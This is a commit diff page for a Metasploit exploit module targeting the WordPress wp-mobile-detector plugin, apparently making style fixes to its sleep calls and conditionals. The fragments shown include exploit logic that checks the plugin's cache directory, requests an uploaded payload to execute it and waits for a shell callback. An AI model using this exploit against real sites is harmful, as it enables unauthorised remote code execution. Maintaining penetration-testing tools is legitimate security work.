wp-mobile-detector udpates
parent
cfd7761818
commit
037c58d1f6
|
@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/'
|
||||
)
|
||||
if res and !res.body.include?(payload_name)
|
||||
if res && !res.body.include?(payload_name)
|
||||
vprint_status("#{payload_name} verified as not written.")
|
||||
else
|
||||
fail_with(Failure::BadConfig,"#{payload_name} already written on system.")
|
||||
|
@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good('Sleeping 5 seconds for payload upload')
|
||||
register_files_for_cleanup(payload_name)
|
||||
|
||||
select(nil,nil,nil,5)
|
||||
Rex.sleep(5)
|
||||
|
||||
print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}")
|
||||
send_request_cgi(
|
||||
|
@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name),
|
||||
})
|
||||
# wait for callback, without this we exit too fast and miss our shell
|
||||
select(nil,nil,nil,2)
|
||||
Rex.sleep(2)
|
||||
handler
|
||||
else
|
||||
if res.nil?
|
||||
|
|
Loading…
Reference in New Issue